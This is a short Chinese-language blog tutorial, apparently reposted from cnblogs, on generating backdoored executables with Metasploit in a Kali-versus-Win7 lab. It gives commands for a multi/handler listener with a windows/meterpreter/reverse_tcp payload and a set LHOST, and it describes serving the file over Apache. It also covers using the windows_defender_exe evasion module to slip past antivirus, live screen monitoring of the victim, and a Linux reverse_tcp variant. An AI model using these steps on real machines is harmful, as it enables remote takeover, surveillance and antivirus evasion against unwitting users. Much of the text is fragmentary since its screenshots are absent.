msf生成软件

生成软件后门程序的命令

 win7获取

生成内网软件

启动kali上的http服务

systemctl start apache2

 开始msf控制台

msfconsole

使用监听模块 并查看配置  show options

use exploit/multi/handler

 配置payload

set payload windows/meterpreter/reverse_tcp

 查看参数

 配置本地接受IP

set LHOST 192.168.19.136

 开始监听

 在win7上运行下载好的test.exe

 系统弹出警告窗口,点击运行。

 获得到shell查看id,ps进程

 下面这段呢是打开一个监控窗口

 效果是这样的      这是win7的界面

 这个窗口是实时的

 

 使用模块生成软件  evasion

 使用win下模块 windows_defender_exe

 配置payload

 生成软件

 配置监听

 配置payload

 运行

制作linux下的可执行文件,操作方法同上

 这里主要有一个坑,使用payload要用 linux/x86/meterpreter/reverse_tcp

猜你喜欢

转载自www.cnblogs.com/zi-Chuan/p/12343469.html
msf